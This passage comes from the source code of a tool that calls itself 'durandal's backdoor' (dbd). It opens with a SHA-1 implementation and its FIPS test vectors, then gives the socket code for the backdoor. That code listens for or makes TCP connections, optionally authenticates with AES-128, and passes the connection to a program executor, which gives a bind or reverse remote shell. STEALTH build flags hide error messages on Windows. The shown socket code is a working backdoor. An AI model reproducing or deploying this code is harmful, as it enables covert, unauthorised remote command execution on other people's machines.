C, D, R(61) ); 164 | P( D, E, A, B, C, R(62) ); 165 | P( C, D, E, A, B, R(63) ); 166 | P( B, C, D, E, A, R(64) ); 167 | P( A, B, C, D, E, R(65) ); 168 | P( E, A, B, C, D, R(66) ); 169 | P( D, E, A, B, C, R(67) ); 170 | P( C, D, E, A, B, R(68) ); 171 | P( B, C, D, E, A, R(69) ); 172 | P( A, B, C, D, E, R(70) ); 173 | P( E, A, B, C, D, R(71) ); 174 | P( D, E, A, B, C, R(72) ); 175 | P( C, D, E, A, B, R(73) ); 176 | P( B, C, D, E, A, R(74) ); 177 | P( A, B, C, D, E, R(75) ); 178 | P( E, A, B, C, D, R(76) ); 179 | P( D, E, A, B, C, R(77) ); 180 | P( C, D, E, A, B, R(78) ); 181 | P( B, C, D, E, A, R(79) ); 182 | 183 | #undef K 184 | #undef F 185 | 186 | ctx->state[0] += A; 187 | ctx->state[1] += B; 188 | ctx->state[2] += C; 189 | ctx->state[3] += D; 190 | ctx->state[4] += E; 191 | } 192 | 193 | void sha1_update( struct sha1_context *ctx, uint8 *input, uint32 length ) 194 | { 195 | uint32 left, fill; 196 | 197 | if( ! length ) return; 198 | 199 | left = ( ctx->total[0] >> 3 ) & 0x3F; 200 | fill = 64 - left; 201 | 202 | ctx->total[0] += length << 3; 203 | ctx->total[1] += length >> 29; 204 | 205 | ctx->total[0] &= 0xFFFFFFFF; 206 | ctx->total[1] += ctx->total[0] < ( length << 3 ); 207 | 208 | if( left && length >= fill ) 209 | { 210 | memcpy( (void *) (ctx->buffer + left), (void *) input, fill ); 211 | sha1_process( ctx, ctx->buffer ); 212 | length -= fill; 213 | input += fill; 214 | left = 0; 215 | } 216 | 217 | while( length >= 64 ) 218 | { 219 | sha1_process( ctx, input ); 220 | length -= 64; 221 | input += 64; 222 | } 223 | 224 | if( length ) 225 | { 226 | memcpy( (void *) (ctx->buffer + left), (void *) input, length ); 227 | } 228 | } 229 | 230 | static uint8 sha1_padding[64] = 231 | { 232 | 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 233 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 234 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 235 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 236 | }; 237 | 238 | void sha1_finish( struct sha1_context *ctx, uint8 digest[20] ) 239 | { 240 | uint32 last, padn; 241 | uint8 msglen[8]; 242 | 243 | PUT_UINT32( ctx->total[1], msglen, 0 ); 244 | PUT_UINT32( ctx->total[0], msglen, 4 ); 245 | 246 | last = ( ctx->total[0] >> 3 ) & 0x3F; 247 | padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last ); 248 | 249 | sha1_update( ctx, sha1_padding, padn ); 250 | sha1_update( ctx, msglen, 8 ); 251 | 252 | PUT_UINT32( ctx->state[0], digest, 0 ); 253 | PUT_UINT32( ctx->state[1], digest, 4 ); 254 | PUT_UINT32( ctx->state[2], digest, 8 ); 255 | PUT_UINT32( ctx->state[3], digest, 12 ); 256 | PUT_UINT32( ctx->state[4], digest, 16 ); 257 | } 258 | 259 | #ifdef TEST 260 | 261 | #include 262 | #include 263 | 264 | /* 265 | * those are the standard FIPS 180-1 test vectors 266 | */ 267 | 268 | static char *msg[] = 269 | { 270 | "abc", 271 | "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", 272 | NULL 273 | }; 274 | 275 | static char *val[] = 276 | { 277 | "a9993e364706816aba3e25717850c26c9cd0d89d", 278 | "84983e441c3bd26ebaae4aa1f95129e5e54670f1", 279 | "34aa973cd4c4daa4f61eeb2bdbad27316534016f" 280 | }; 281 | 282 | int main( int argc, char *argv[] ) 283 | { 284 | FILE *f; 285 | int i, j; 286 | char output[41]; 287 | struct sha1_context ctx; 288 | unsigned char sha1sum[20], buffer[1000]; 289 | 290 | if( argc < 2 ) 291 | { 292 | for( i = 0; i < 3; i++ ) 293 | { 294 | sha1_starts( &ctx ); 295 | 296 | if( i < 2 ) 297 | { 298 | sha1_update( &ctx, (uint8 *) msg[i], strlen( msg[i] ) ); 299 | } 300 | else 301 | { 302 | memset( buffer, 'a', 1000 ); 303 | 304 | for( j = 0; j < 1000; j++ ) 305 | { 306 | sha1_update( &ctx, (uint8 *) buffer, 1000 ); 307 | } 308 | } 309 | 310 | sha1_finish( &ctx, sha1sum ); 311 | 312 | for( j = 0; j < 20; j++ ) 313 | { 314 | sprintf( output + j * 2, "%02x", sha1sum[j] ); 315 | } 316 | 317 | printf( "test %d ", i + 1 ); 318 | 319 | if( ! memcmp( output, val[i], 40 ) ) 320 | { 321 | printf( "passed\n" ); 322 | } 323 | else 324 | { 325 | printf( "failed\n" ); 326 | return( 1 ); 327 | } 328 | } 329 | } 330 | else 331 | { 332 | if( ! ( f = fopen( argv[1], "rb" ) ) ) 333 | { 334 | perror( "fopen" ); 335 | return( 1 ); 336 | } 337 | 338 | sha1_starts( &ctx ); 339 | 340 | while( ( i = fread( buffer, 1, sizeof( buffer ), f ) ) > 0 ) 341 | { 342 | sha1_update( &ctx, buffer, i ); 343 | } 344 | 345 | sha1_finish( &ctx, sha1sum ); 346 | 347 | for( j = 0; j < 20; j++ ) 348 | { 349 | printf( "%02x", sha1sum[j] ); 350 | } 351 | 352 | printf( " %s\n", argv[1] ); 353 | } 354 | 355 | return( 0 ); 356 | } 357 | 358 | #endif 359 | -------------------------------------------------------------------------------- /sha1.h: -------------------------------------------------------------------------------- 1 | #ifndef _SHA1_H 2 | #define _SHA1_H 3 | 4 | #ifndef uint8 5 | #define uint8 unsigned char 6 | #endif 7 | 8 | #ifndef uint32 9 | #define uint32 unsigned long int 10 | #endif 11 | 12 | struct sha1_context 13 | { 14 | uint32 total[2]; 15 | uint32 state[5]; 16 | uint8 buffer[64]; 17 | }; 18 | 19 | void sha1_starts( struct sha1_context *ctx ); 20 | void sha1_update( struct sha1_context *ctx, uint8 *input, uint32 length ); 21 | void sha1_finish( struct sha1_context *ctx, uint8 digest[20] ); 22 | 23 | #endif /* sha1.h */ 24 | -------------------------------------------------------------------------------- /socket_code.h: -------------------------------------------------------------------------------- 1 | /* 2 | * dbd - durandal's backdoor 3 | * Copyright (C) 2013 Kyle Barnthouse 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms of the GNU General Public License as published by the Free 7 | * Software Foundation; either version 2 of the License, or (at your option) 8 | * any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but WITHOUT 11 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 12 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 13 | * more details. 14 | * 15 | * You should have received a copy of the GNU General Public License along 16 | * with this program; if not, write to the Free Software Foundation, Inc., 59 17 | * Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * See the COPYING file for more information. 20 | */ 21 | 22 | /* 23 | * dbd_listen() handles inbound connections 24 | */ 25 | int dbd_listen(int lport, char *bindToAddress) { 26 | #ifdef WIN32 27 | WORD wVersionRequested; 28 | WSADATA wsaData; 29 | SOCKET sd; 30 | SOCKET clisd; 31 | float socklib_ver; 32 | #else 33 | int sd; 34 | int clisd; 35 | #endif 36 | 37 | int clilen; 38 | int sopt; 39 | 40 | struct sockaddr_in dbdAddr; 41 | struct sockaddr_in cliAddr; 42 | 43 | 44 | #ifdef WIN32 45 | wVersionRequested = MAKEWORD(1,1); 46 | if (WSAStartup(wVersionRequested, &wsaData)) { 47 | #ifndef WINMAIN 48 | if (!quiet) 49 | fprintf(stderr, "WSAStartup: %s\n", WSAstrerror(WSAGetLastError())); 50 | #else 51 | #ifndef STEALTH 52 | if (!quiet) 53 | wsaerrbox("WSAStartup", WSAGetLastError()); 54 | #endif 55 | #endif 56 | return 1; 57 | } 58 | /* check if winsock DLL supports 1.1 (or higher) */ 59 | socklib_ver = HIBYTE(wsaData.wVersion) / 10.0; 60 | socklib_ver += LOBYTE(wsaData.wVersion); 61 | if (socklib_ver < 1.1) { 62 | #ifndef WINMAIN 63 | if (!quiet) 64 | fprintf(stderr, "socket library must support 1.1 or higher\n"); 65 | #else 66 | #ifndef STEALTH 67 | if (!quiet) 68 | errbox("socket library must support 1.1 or higher"); 69 | #endif 70 | #endif 71 | WSACleanup(); 72 | return 1; 73 | } 74 | #endif 75 | 76 | /* create socket */ 77 | 78 | #ifdef WIN32 79 | if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { 80 | #else 81 | if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { 82 | #endif 83 | #ifndef WINMAIN 84 | if (!quiet) 85 | fprintf(stderr, "socket(): %s\n", 86 | #ifdef WIN32 87 | WSAstrerror(WSAGetLastError()) 88 | #else 89 | strerror(errno) 90 | #endif 91 | ); 92 | #else 93 | #ifndef STEALTH 94 | if (!quiet) 95 | wsaerrbox("socket()", WSAGetLastError()); 96 | #endif 97 | #endif 98 | #ifdef WIN32 99 | WSACleanup(); 100 | #endif 101 | return 1; 102 | } 103 | 104 | /* create dbdAddr for bind() */ 105 | 106 | dbdAddr.sin_family = AF_INET; 107 | /* dbdAddr.sin_addr.s_addr = htonl(INADDR_ANY); */ 108 | /* we don't bind to INADDR_ANY if the -a option was specified */ 109 | if (!bindToAddress) { 110 | /* but if -a wasn't given, we have to... */ 111 | dbdAddr.sin_addr.s_addr = htonl(INADDR_ANY); 112 | } else { 113 | struct hostent *he_bta = NULL; 114 | if (!(he_bta = gethostbyname(bindToAddress))) { 115 | #ifndef WINMAIN 116 | if (!quiet) 117 | fprintf(stderr, "failed to resolve %s: %s\n", bindToAddress, 118 | #ifdef WIN32 119 | WSAstrerror(WSAGetLastError()) 120 | #else 121 | hstrerror(h_errno) 122 | #endif 123 | ); 124 | #else 125 | #ifndef STEALTH 126 | if (!quiet) 127 | wsaerrbox(bindToAddress, WSAGetLastError()); 128 | #endif 129 | #endif 130 | #ifdef WIN32 131 | WSACleanup(); 132 | #endif 133 | return 2; 134 | } 135 | dbdAddr.sin_family = he_bta->h_addrtype; 136 | memcpy(&(dbdAddr.sin_addr), he_bta->h_addr, he_bta->h_length); 137 | } 138 | dbdAddr.sin_port = htons(lport); 139 | 140 | /* set REUSEADDR socket option */ 141 | sopt = 1; 142 | #ifdef WIN32 143 | if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char*)&sopt, sizeof(sopt))) { 144 | #else 145 | if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (void*)&sopt, sizeof(sopt))) { 146 | #endif 147 | #ifndef WINMAIN 148 | if (!quiet) 149 | fprintf(stderr, "setsockopt() REUSEADDR: %s\n", 150 | #ifdef WIN32 151 | WSAstrerror(WSAGetLastError()) 152 | #else 153 | strerror(errno) 154 | #endif 155 | ); 156 | #else 157 | #ifndef STEALTH 158 | if (!quiet) 159 | wsaerrbox("setsockopt() REUSEADDR", WSAGetLastError()); 160 | #endif 161 | #endif 162 | #ifdef WIN32 163 | closesocket(sd); 164 | WSACleanup(); 165 | #else 166 | close(sd); 167 | #endif 168 | return 1; 169 | } 170 | 171 | /* call bind() */ 172 | 173 | if (bind(sd, (struct sockaddr*) &dbdAddr, sizeof(dbdAddr))) { 174 | #ifndef WINMAIN 175 | if (!quiet) 176 | fprintf(stderr, "bind(): %s\n", 177 | #ifdef WIN32 178 | WSAstrerror(WSAGetLastError()) 179 | #else 180 | strerror(errno) 181 | #endif 182 | ); 183 | #else 184 | #ifndef STEALTH 185 | if (!quiet) 186 | wsaerrbox("bind()", WSAGetLastError()); 187 | #endif 188 | #endif 189 | #ifdef WIN32 190 | closesocket(sd); 191 | WSACleanup(); 192 | #else 193 | close(sd); 194 | #endif 195 | return 1; 196 | } 197 | 198 | /* listen for incoming connection */ 199 | 200 | if (listen(sd, 1)) { 201 | #ifndef WINMAIN 202 | if (!quiet) 203 | fprintf(stderr, "listen(): %s\n", 204 | #ifdef WIN32 205 | WSAstrerror(WSAGetLastError()) 206 | #else 207 | strerror(errno) 208 | #endif 209 | ); 210 | #else 211 | #ifndef STEALTH 212 | if (!quiet) 213 | wsaerrbox("listen()", WSAGetLastError()); 214 | #endif 215 | #endif 216 | #ifdef WIN32 217 | closesocket(sd); 218 | WSACleanup(); 219 | #else 220 | close(sd); 221 | #endif 222 | return 1; 223 | } 224 | 225 | 226 | if (verbose) { 227 | char tempbuf[128]; 228 | tempbuf[0] = 0; 229 | 230 | snprintf(tempbuf, sizeof(tempbuf)-1, "listening on "); 231 | if (bindToAddress) { 232 | snprintf(&tempbuf[strlen(tempbuf)], sizeof(tempbuf)-strlen(tempbuf), 233 | "address %s, port %u", inet_ntoa(dbdAddr.sin_addr), (unsigned int)lport); 234 | } else { 235 | snprintf(&tempbuf[strlen(tempbuf)], sizeof(tempbuf)-strlen(tempbuf), 236 | "port %u", (unsigned int)lport); 237 | } 238 | fprintf(stderr, "%s\n", tempbuf); 239 | } 240 | 241 | /* accept connection, this will block */ 242 | 243 | clilen = sizeof(cliAddr); 244 | #ifdef WIN32 245 | if ((clisd = accept(sd, (struct sockaddr*) &cliAddr, &clilen)) == INVALID_SOCKET) { 246 | #else 247 | if ((clisd = accept(sd, (struct sockaddr*) &cliAddr, &clilen)) < 0) { 248 | #endif 249 | #ifndef WINMAIN 250 | if (!quiet) 251 | fprintf(stderr, "accept(): %s\n", 252 | #ifdef WIN32 253 | WSAstrerror(WSAGetLastError()) 254 | #else 255 | strerror(errno) 256 | #endif 257 | ); 258 | #else 259 | #ifndef STEALTH 260 | if (!quiet) 261 | wsaerrbox("accept()", WSAGetLastError()); 262 | #endif 263 | #endif 264 | #ifdef WIN32 265 | closesocket(sd); 266 | WSACleanup(); 267 | #else 268 | close(sd); 269 | #endif 270 | return 1; 271 | } 272 | 273 | /* close listening socket, we won't need it */ 274 | #ifdef WIN32 275 | closesocket(sd); 276 | #else 277 | close(sd); 278 | #endif 279 | 280 | 281 | if (verbose) { 282 | struct sockaddr_in gsnAddr; 283 | int gsnlen = sizeof(struct sockaddr_in); 284 | struct hostent *gsnhe; 285 | 286 | char toaddr_unknown[] = "??"; 287 | char fromhost_unknown[] = "n/a"; 288 | char *toaddr = NULL; 289 | char *fromhost = NULL; 290 | 291 | if (getsockname(clisd, (struct sockaddr*) &gsnAddr, &gsnlen)) { 292 | /* handle error */ 293 | #ifndef WINMAIN 294 | if (!quiet) 295 | fprintf(stderr, "getsockname(): %s\n", 296 | #ifdef WIN32 297 | WSAstrerror(WSAGetLastError()) 298 | #else 299 | strerror(errno) 300 | #endif 301 | ); 302 | #else 303 | #ifndef STEALTH 304 | if (!quiet) 305 | wsaerrbox("getsockname()", WSAGetLastError()); 306 | #endif 307 | #endif 308 | } else { 309 | /* ok */ 310 | toaddr = strdup(inet_ntoa(gsnAddr.sin_addr)); 311 | } 312 | 313 | if (!toaddr) { 314 | toaddr = toaddr_unknown; 315 | } 316 | 317 | if (use_dns) { 318 | if (!(gsnhe = gethostbyaddr((unsigned char *)&cliAddr.sin_addr.s_addr, 319 | sizeof(cliAddr.sin_addr.s_addr), AF_INET))) { 320 | /* handle error */ 321 | #ifndef WINMAIN 322 | if (!quiet) 323 | fprintf(stderr, "reverse lookup of %s failed: %s\n", 324 | inet_ntoa(cliAddr.sin_addr), 325 | #ifdef WIN32 326 | WSAstrerror(WSAGetLastError()) 327 | #else 328 | hstrerror(h_errno) 329 | #endif 330 | ); 331 | #else 332 | #ifndef STEALTH 333 | if (!quiet) 334 | wsaerrbox(inet_ntoa(dbdAddr.sin_addr), WSAGetLastError()); 335 | #endif 336 | #endif 337 | 338 | fromhost = fromhost_unknown; 339 | } else { 340 | /* ok */ 341 | fromhost = (char *)gsnhe->h_name; 342 | } 343 | } else { 344 | fromhost = fromhost_unknown; 345 | } 346 | 347 | fprintf(stderr, "connect to %s:%u from %s:%u (%s)\n", 348 | toaddr, (unsigned int)lport, inet_ntoa(cliAddr.sin_addr), 349 | ntohs(cliAddr.sin_port), fromhost); 350 | } 351 | 352 | 353 | 354 | /* if we're using AES-128 encryption, initialize the server part */ 355 | 356 | if (use_encryption) { 357 | if (pel_server_init(clisd, aes_secret) != PEL_SUCCESS) { 358 | #ifndef WINMAIN 359 | if (!quiet) 360 | fprintf(stderr, "authentication failed (aes-cbc-128)\n"); 361 | #else 362 | #ifndef STEALTH 363 | if (!quiet) 364 | errbox("authentication failed (aes-cbc-128)"); 365 | #endif 366 | #endif 367 | #ifdef WIN32 368 | closesocket(clisd); 369 | WSACleanup(); 370 | #else 371 | close(clisd); 372 | #endif 373 | return 2; 374 | } 375 | } 376 | 377 | /* if there's a program to execute, we do just that */ 378 | 379 | #ifndef WIN32 380 | /* ignore "Broken pipe" */ 381 | signal(SIGPIPE, SIG_IGN); 382 | #endif 383 | 384 | if (program_to_execute) { 385 | if (verbose && program_to_execute) { 386 | fprintf(stderr, "executing: %s\n", program_to_execute); 387 | } 388 | 389 | doexec(clisd); 390 | 391 | /* doexec closes the socket when done */ 392 | #ifndef WINMAIN 393 | if (verbose) { 394 | fprintf(stderr, "connection closed\n"); 395 | } 396 | #endif 397 | } else { 398 | readwrite(clisd); 399 | #ifdef WIN32 400 | closesocket(clisd); 401 | #else 402 | close(clisd); 403 | #endif 404 | } 405 | 406 | #ifndef WIN32 407 | /* restore default OS behaviour 408 | ("Broken pipe" messages at least under Linux and *BSD) 409 | */ 410 | signal(SIGPIPE, SIG_DFL); 411 | #endif 412 | 413 | #ifdef WIN32 414 | WSACleanup(); 415 | #endif 416 | return 0; 417 | } 418 | 419 | 420 | /* 421 | * dbd_connect() handles outbound connections 422 | */ 423 | int dbd_connect(char *chost, int cport, int mysport, char *bindToAddress) { 424 | #ifdef WIN32 425 | WORD wVersionRequested; 426 | WSADATA wsaData; 427 | SOCKET sd; 428 | float socklib_ver; 429 | #else 430 | int sd; 431 | #endif 432 | 433 | int sopt; 434 | struct hostent *he = NULL; 435 | struct sockaddr_in dbdAddr; 436 | struct sockaddr_in bindAddr; 437 | 438 | char *arpa_host = NULL; 439 | 440 | 441 | #ifdef WIN32 442 | wVersionRequested = MAKEWORD(1,1); 443 | if (WSAStartup(wVersionRequested, &wsaData)) { 444 | #ifndef WINMAIN 445 | if (!quiet) 446 | fprintf(stderr, "WSAStartup: %s\n", WSAstrerror(WSAGetLastError())); 447 | #else 448 | #ifndef STEALTH 449 | if (!quiet) 450 | wsaerrbox("WSAStartup", WSAGetLastError()); 451 | #endif 452 | #endif 453 | return 1; 454 | } 455 | /* check if winsock DLL supports 1.1 (or higher) */ 456 | socklib_ver = HIBYTE(wsaData.wVersion) / 10.0; 457 | socklib_ver += LOBYTE(wsaData.wVersion); 458 | if (socklib_ver < 1.1) { 459 | #ifndef WINMAIN 460 | if (!quiet) 461 | fprintf(stderr, "socket library must support 1.1 or higher\n"); 462 | #else 463 | #ifndef STEALTH 464 | if (!quiet) 465 | errbox("socket library must support 1.1 or higher"); 466 | #endif 467 | #endif 468 | WSACleanup(); 469 | return 1; 470 | } 471 | #endif 472 | 473 | 474 | /* resolve hostname */ 475 | 476 | /* fist check if it's an ip address or a hostname */ 477 | 478 | dbdAddr.sin_addr.s_addr = inet_addr(chost); 479 | if (dbdAddr.sin_addr.s_addr == INADDR_NONE) { 480 | /* it seems to be a hostname */ 481 | 482 | if (!use_dns) { 483 | fprintf(stderr, "warning: resolving \"%s\" even though you specified -n\n", chost); 484 | } 485 | 486 | if (!(he = gethostbyname(chost))) { 487 | #ifndef WINMAIN 488 | if (!quiet) 489 | fprintf(stderr, "failed to resolve %s: %s\n", chost, 490 | #ifdef WIN32 491 | WSAstrerror(WSAGetLastError()) 492 | #else 493 | hstrerror(h_errno) 494 | #endif 495 | ); 496 | #else 497 | #ifndef STEALTH 498 | if (!quiet) 499 | wsaerrbox(chost, WSAGetLastError()); 500 | #endif 501 | #endif 502 | #ifdef WIN32 503 | WSACleanup(); 504 | #endif 505 | return 2; 506 | } 507 | 508 | /* create dbdAaddr */ 509 | dbdAddr.sin_family = he->h_addrtype; 510 | memcpy(&(dbdAddr.sin_addr), he->h_addr, he->h_length); 511 | 512 | if (verbose) { /* in addition, do reverse lookup of ip */ 513 | if (use_dns) { 514 | if (!(he = gethostbyaddr((unsigned char *)&dbdAddr.sin_addr.s_addr, 515 | sizeof(dbdAddr.sin_addr.s_addr), AF_INET))) { 516 | /* handle error */ 517 | #ifndef WINMAIN 518 | if (!quiet) 519 | fprintf(stderr, "reverse lookup of %s failed: %s\n", 520 | inet_ntoa(dbdAddr.sin_addr), 521 | #ifdef WIN32 522 | WSAstrerror(WSAGetLastError()) 523 | #else 524 | hstrerror(h_errno) 525 | #endif 526 | ); 527 | #else 528 | #ifndef STEALTH 529 | if (!quiet) 530 | wsaerrbox(inet_ntoa(dbdAddr.sin_addr), WSAGetLastError()); 531 | #endif 532 | #endif 533 | 534 | arpa_host = chost; 535 | } else { 536 | /* ok */ 537 | if (!(arpa_host = strdup((const char *)he->h_name))) { 538 | arpa_host = chost; 539 | } 540 | } 541 | } else { 542 | arpa_host = chost; 543 | } 544 | } 545 | 546 | } else { 547 | /* else it seems to be an ip address */ 548 | /* create dbdAaddr */ 549 | dbdAddr.sin_family = AF_INET; 550 | /* dbdAddr.sin_addr.s_addr has already been filled in above */ 551 | 552 | if (verbose) { /* do reverse lookup */ 553 | if (use_dns) { 554 | if (!(he = gethostbyaddr((unsigned char *)&dbdAddr.sin_addr.s_addr, 555 | sizeof(dbdAddr.sin_addr.s_addr), AF_INET))) { 556 | /* handle error */ 557 | #ifndef WINMAIN 558 | if (!quiet) 559 | fprintf(stderr, "reverse lookup of %s failed: %s\n", 560 | inet_ntoa(dbdAddr.sin_addr), 561 | #ifdef WIN32 562 | WSAstrerror(WSAGetLastError()) 563 | #else 564 | hstrerror(h_errno) 565 | #endif 566 | ); 567 | #else 568 | #ifndef STEALTH 569 | if (!quiet) 570 | wsaerrbox(inet_ntoa(dbdAddr.sin_addr), WSAGetLastError()); 571 | #endif 572 | #endif 573 | 574 | arpa_host = chost; 575 | } else { 576 | /* ok */ 577 | if (!(arpa_host = strdup((const char *)he->h_name))) { 578 | arpa_host = chost; 579 | } 580 | } 581 | } else { 582 | arpa_host = chost; 583 | } 584 | } 585 | } 586 | dbdAddr.sin_port = htons(cport); 587 | 588 | 589 | /* create socket */ 590 | 591 | #ifdef WIN32 592 | if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { 593 | #else 594 | if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { 595 | #endif 596 | #ifndef WINMAIN 597 | if (!quiet) 598 | fprintf(stderr, "socket(): %s\n", 599 | #ifdef WIN32 600 | WSAstrerror(WSAGetLastError()) 601 | #else 602 | strerror(errno) 603 | #endif 604 | ); 605 | #else 606 | #ifndef STEALTH 607 | if (!quiet) 608 | wsaerrbox("socket()", WSAGetLastError()); 609 | #endif 610 | #endif 611 | #ifdef WIN32 612 | WSACleanup(); 613 | #endif 614 | return 1; 615 | } 616 | 617 | 618 | 619 | /* if -a was specified, bind to a specific address */ 620 | 621 | if (bindToAddress) { 622 | /* we don't bind to INADDR_ANY if the -a option was specified */ 623 | struct hostent *he_bta = NULL; 624 | if (!(he_bta = gethostbyname(bindToAddress))) { 625 | #ifndef WINMAIN 626 | if (!quiet) 627 | fprintf(stderr, "failed to resolve %s: %s\n", bindToAddress, 628 | #ifdef WIN32 629 | WSAstrerror(WSAGetLastError()) 630 | #else 631 | hstrerror(h_errno) 632 | #endif 633 | ); 634 | #else 635 | #ifndef STEALTH 636 | if (!quiet) 637 | wsaerrbox(bindToAddress, WSAGetLastError()); 638 | #endif 639 | #endif 640 | #ifdef WIN32 641 | WSACleanup(); 642 | #endif 643 | return 2; 644 | } 645 | bindAddr.sin_family = he_bta->h_addrtype; 646 | memcpy(&(bindAddr.sin_addr), he_bta->h_addr, he_bta->h_length); 647 | } else { 648 | /* but if -a wasn't given, we have to set it to INADDR_ANY... */ 649 | bindAddr.sin_addr.s_addr = htonl(INADDR_ANY); 650 | } 651 | /* default port */ 652 | bindAddr.sin_port = htons(0); 653 | 654 | 655 | /* if sport is > 0 && <= 65535, attempt to bind() to sport */ 656 | 657 | if ((mysport) && (mysport <= 65535)) { 658 | bindAddr.sin_family = AF_INET; 659 | bindAddr.sin_port = htons(mysport); 660 | 661 | /* set REUSEADDR socket option */ 662 | sopt = 1; 663 | #ifdef WIN32 664 | if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char*)&sopt, sizeof(sopt))) { 665 | #else 666 | if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (void*)&sopt, sizeof(sopt))) { 667 | #endif 668 | #ifndef WINMAIN 669 | if (!quiet) 670 | fprintf(stderr, "setsockopt() REUSEADDR: %s\n", 671 | #ifdef WIN32 672 | WSAstrerror(WSAGetLastError()) 673 | #else 674 | strerror(errno) 675 | #endif 676 | ); 677 | #else 678 | #ifndef STEALTH 679 | if (!quiet) 680 | wsaerrbox("setsockopt() REUSEADDR", WSAGetLastError()); 681 | #endif 682 | #endif 683 | #ifdef WIN32 684 | closesocket(sd); 685 | WSACleanup(); 686 | #else 687 | close(sd); 688 | #endif 689 | return 2; 690 | } 691 | } 692 | 693 | 694 | /* don't bind unless source port and/or address was given */ 695 | if ((bindToAddress) || ((mysport) && (mysport <= 65535))) { 696 | /* bind to custom address and/or source port */ 697 | if (bind(sd, (struct sockaddr*) &bindAddr, sizeof(bindAddr))) { 698 | #ifndef WINMAIN 699 | if (!quiet) 700 | fprintf(stderr, "bind(): %s\n", 701 | #ifdef WIN32 702 | WSAstrerror(WSAGetLastError()) 703 | #else 704 | strerror(errno) 705 | #endif 706 | ); 707 | #else 708 | #ifndef STEALTH 709 | if (!quiet) 710 | wsaerrbox("bind()", WSAGetLastError()); 711 | #endif 712 | #endif 713 | #ifdef WIN32 714 | closesocket(sd); 715 | WSACleanup(); 716 | #else 717 | close(sd); 718 | #endif 719 | return 2; 720 | } 721 | } 722 | 723 | 724 | if (verbose) { 725 | char tempbuf[256]; 726 | char *ascii_ip = strdup(inet_ntoa(dbdAddr.sin_addr)); 727 | tempbuf[0] = 0; 728 | 729 | if ((!strcasecmp(chost, arpa_host))) { 730 | /* if chost == arpa_host no need to parse in arpa_host */ 731 | snprintf(tempbuf, sizeof(tempbuf)-1, "connecting to %s [%s] on port %u", 732 | chost, ascii_ip, 733 | (unsigned int)cport); 734 | } else { 735 | /* chost != arpa_host, parse in both */ 736 | snprintf(tempbuf, sizeof(tempbuf)-1, "connecting to %s (%s) [%s] on port %u", 737 | chost, arpa_host, ascii_ip, 738 | (unsigned int)cport); 739 | } 740 | 741 | if (bindToAddress) { 742 | snprintf(&tempbuf[strlen(tempbuf)], sizeof(tempbuf)-strlen(tempbuf), 743 | " from %s", inet_ntoa(bindAddr.sin_addr)); 744 | if (mysport) { 745 | snprintf(&tempbuf[strlen(tempbuf)], sizeof(tempbuf)-strlen(tempbuf), 746 | ":%u", (unsigned int)mysport); 747 | } 748 | } else { 749 | if (mysport) { 750 | snprintf(&tempbuf[strlen(tempbuf)], sizeof(tempbuf)-strlen(tempbuf), 751 | " (from source port %u)", (unsigned int)mysport); 752 | } 753 | } 754 | fprintf(stderr, "%s\n", tempbuf); 755 | free(ascii_ip); 756 | } 757 | 758 | /* connect */ 759 | 760 | if (connect(sd, (struct sockaddr*)&dbdAddr, sizeof(dbdAddr))) { 761 | #ifndef WINMAIN 762 | if (!quiet) 763 | fprintf(stderr, "connect(): %s\n", 764 | #ifdef WIN32 765 | WSAstrerror(WSAGetLastError()) 766 | #else 767 | strerror(errno) 768 | #endif 769 | ); 770 | #else 771 | #ifndef STEALTH 772 | if ((!quiet) && (!respawn_enabled)) 773 | wsaerrbox("connect()", WSAGetLastError()); 774 | #endif 775 | #endif 776 | #ifdef WIN32 777 | closesocket(sd); 778 | WSACleanup(); 779 | #else 780 | close(sd); 781 | #endif 782 | return 2; 783 | } 784 | 785 | 786 | if (verbose) { 787 | fprintf(stderr, "connected to %s:%u\n", 788 | inet_ntoa(dbdAddr.sin_addr), 789 | (unsigned int)cport); 790 | 791 | } 792 | 793 | /* we've got a connection */ 794 | 795 | /* if we're using AES-128 encryption, initialize the client part */ 796 | if (use_encryption) { 797 | if (pel_client_init(sd, aes_secret) != PEL_SUCCESS) { 798 | #ifndef WINMAIN 799 | if (!quiet) 800 | fprintf(stderr, "authentication failed (aes-cbc-128)\n"); 801 | #else 802 | #ifndef STEALTH 803 | if (!quiet) 804 | errbox("authentication failed (aes-cbc-128)"); 805 | #endif 806 | #endif 807 | #ifdef WIN32 808 | closesocket(sd); 809 | WSACleanup(); 810 | #else 811 | close(sd); 812 | #endif 813 | return 2; 814 | } 815 | } 816 | 817 | /* if there's a program to execute, we do just that */ 818 | 819 | if (program_to_execute) { 820 | doexec(sd); 821 | /* doexec closes the socket when done */ 822 | #ifndef WINMAIN 823 | if (verbose) { 824 | fprintf(stderr, "connection closed\n"); 825 | } 826 | #endif 827 | } else { 828 | readwrite(sd); 829 | #ifdef WIN32 830 | closesocket(sd); 831 | #else 832 | close(sd); 833 | #endif 834 | } 835 | 836 | #ifdef WIN32 837 | WSACleanup(); 838 | #endif 839 | return 0; 840 | } 841 | --------------------------------------------------------------------------------